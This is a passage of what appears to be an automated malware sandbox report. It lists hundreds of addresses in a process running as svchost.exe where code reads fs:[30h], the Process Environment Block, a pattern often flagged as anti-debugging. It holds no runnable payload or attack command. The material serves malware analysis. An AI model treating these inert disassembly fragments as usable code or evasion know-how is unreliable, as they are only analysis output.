Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F351ED mov eax, dword ptr fs:[00000030h]	1_2_02F351ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6D1D0 mov eax, dword ptr fs:[00000030h]	1_2_02F6D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6D1D0 mov ecx, dword ptr fs:[00000030h]	1_2_02F6D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_02FAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]	1_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]	1_2_02FF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4B1B0 mov eax, dword ptr fs:[00000030h]	1_2_02F4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE11A4 mov eax, dword ptr fs:[00000030h]	1_2_02FE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE11A4 mov eax, dword ptr fs:[00000030h]	1_2_02FE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE11A4 mov eax, dword ptr fs:[00000030h]	1_2_02FE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE11A4 mov eax, dword ptr fs:[00000030h]	1_2_02FE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03005060 mov eax, dword ptr fs:[00000030h]	1_2_03005060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]	1_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]	1_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]	1_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]	1_2_02FB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]	1_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]	1_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]	1_2_02F2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F87190 mov eax, dword ptr fs:[00000030h]	1_2_02F87190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]	1_2_02F70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]	1_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]	1_2_02FEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F172 mov eax, dword ptr fs:[00000030h]	1_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC9179 mov eax, dword ptr fs:[00000030h]	1_2_02FC9179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F37152 mov eax, dword ptr fs:[00000030h]	1_2_02F37152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]	1_2_02F2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]	1_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]	1_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]	1_2_02F36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]	1_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]	1_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]	1_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]	1_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]	1_2_02FC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29148 mov eax, dword ptr fs:[00000030h]	1_2_02F29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29148 mov eax, dword ptr fs:[00000030h]	1_2_02F29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29148 mov eax, dword ptr fs:[00000030h]	1_2_02F29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29148 mov eax, dword ptr fs:[00000030h]	1_2_02F29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC3140 mov eax, dword ptr fs:[00000030h]	1_2_02FC3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC3140 mov eax, dword ptr fs:[00000030h]	1_2_02FC3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC3140 mov eax, dword ptr fs:[00000030h]	1_2_02FC3140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F31131 mov eax, dword ptr fs:[00000030h]	1_2_02F31131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F31131 mov eax, dword ptr fs:[00000030h]	1_2_02F31131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B136 mov eax, dword ptr fs:[00000030h]	1_2_02F2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B136 mov eax, dword ptr fs:[00000030h]	1_2_02F2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B136 mov eax, dword ptr fs:[00000030h]	1_2_02F2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B136 mov eax, dword ptr fs:[00000030h]	1_2_02F2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]	1_2_02F60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030050D9 mov eax, dword ptr fs:[00000030h]	1_2_030050D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]	1_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]	1_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]	1_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]	1_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]	1_2_02FF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_02FAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]	1_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]	1_2_02FB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FED6F0 mov eax, dword ptr fs:[00000030h]	1_2_02FED6F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC36EE mov eax, dword ptr fs:[00000030h]	1_2_02FC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC36EE mov eax, dword ptr fs:[00000030h]	1_2_02FC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC36EE mov eax, dword ptr fs:[00000030h]	1_2_02FC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC36EE mov eax, dword ptr fs:[00000030h]	1_2_02FC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC36EE mov eax, dword ptr fs:[00000030h]	1_2_02FC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC36EE mov eax, dword ptr fs:[00000030h]	1_2_02FC36EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5D6E0 mov eax, dword ptr fs:[00000030h]	1_2_02F5D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5D6E0 mov eax, dword ptr fs:[00000030h]	1_2_02F5D6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]	1_2_02F6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3B6C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3B6C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF16CC mov eax, dword ptr fs:[00000030h]	1_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF16CC mov eax, dword ptr fs:[00000030h]	1_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF16CC mov eax, dword ptr fs:[00000030h]	1_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF16CC mov eax, dword ptr fs:[00000030h]	1_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEF6C7 mov eax, dword ptr fs:[00000030h]	1_2_02FEF6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F616CF mov eax, dword ptr fs:[00000030h]	1_2_02F616CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300B73C mov eax, dword ptr fs:[00000030h]	1_2_0300B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300B73C mov eax, dword ptr fs:[00000030h]	1_2_0300B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300B73C mov eax, dword ptr fs:[00000030h]	1_2_0300B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300B73C mov eax, dword ptr fs:[00000030h]	1_2_0300B73C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F276B2 mov eax, dword ptr fs:[00000030h]	1_2_02F276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F276B2 mov eax, dword ptr fs:[00000030h]	1_2_02F276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F276B2 mov eax, dword ptr fs:[00000030h]	1_2_02F276B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]	1_2_02F666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03003749 mov eax, dword ptr fs:[00000030h]	1_2_03003749
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]	1_2_02F6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2D6AA mov eax, dword ptr fs:[00000030h]	1_2_02F2D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2D6AA mov eax, dword ptr fs:[00000030h]	1_2_02F2D6AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]	1_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]	1_2_02F34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB368C mov eax, dword ptr fs:[00000030h]	1_2_02FB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB368C mov eax, dword ptr fs:[00000030h]	1_2_02FB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB368C mov eax, dword ptr fs:[00000030h]	1_2_02FB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB368C mov eax, dword ptr fs:[00000030h]	1_2_02FB368C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]	1_2_02F62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]	1_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]	1_2_02FF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]	1_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]	1_2_02F6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F69660 mov eax, dword ptr fs:[00000030h]	1_2_02F69660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F69660 mov eax, dword ptr fs:[00000030h]	1_2_02F69660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]	1_2_02F4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030037B6 mov eax, dword ptr fs:[00000030h]	1_2_030037B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]	1_2_02F4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F626 mov eax, dword ptr fs:[00000030h]	1_2_02F2F626
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]	1_2_02F66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]	1_2_02F68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]	1_2_02F3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F33616 mov eax, dword ptr fs:[00000030h]	1_2_02F33616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F33616 mov eax, dword ptr fs:[00000030h]	1_2_02F33616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]	1_2_02F72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F61607 mov eax, dword ptr fs:[00000030h]	1_2_02F61607
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]	1_2_02FAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6F603 mov eax, dword ptr fs:[00000030h]	1_2_02F6F603
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]	1_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]	1_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]	1_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]	1_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]	1_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]	1_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]	1_2_02F4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]	1_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]	1_2_02F347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3D7E0 mov ecx, dword ptr fs:[00000030h]	1_2_02F3D7E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]	1_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]	1_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]	1_2_02F527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]	1_2_02FBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F357C0 mov eax, dword ptr fs:[00000030h]	1_2_02F357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F357C0 mov eax, dword ptr fs:[00000030h]	1_2_02F357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F357C0 mov eax, dword ptr fs:[00000030h]	1_2_02F357C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03005636 mov eax, dword ptr fs:[00000030h]	1_2_03005636
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]	1_2_02FB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5D7B0 mov eax, dword ptr fs:[00000030h]	1_2_02F5D7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2F7BA mov eax, dword ptr fs:[00000030h]	1_2_02F2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB97A9 mov eax, dword ptr fs:[00000030h]	1_2_02FB97A9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBF7AF mov eax, dword ptr fs:[00000030h]	1_2_02FBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBF7AF mov eax, dword ptr fs:[00000030h]	1_2_02FBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBF7AF mov eax, dword ptr fs:[00000030h]	1_2_02FBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBF7AF mov eax, dword ptr fs:[00000030h]	1_2_02FBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBF7AF mov eax, dword ptr fs:[00000030h]	1_2_02FBF7AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]	1_2_02F307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEF78A mov eax, dword ptr fs:[00000030h]	1_2_02FEF78A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]	1_2_02F38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]	1_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B765 mov eax, dword ptr fs:[00000030h]	1_2_02F2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B765 mov eax, dword ptr fs:[00000030h]	1_2_02F2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B765 mov eax, dword ptr fs:[00000030h]	1_2_02F2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2B765 mov eax, dword ptr fs:[00000030h]	1_2_02F2B765
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]	1_2_02F30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]	1_2_02FBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]	1_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]	1_2_02F72750
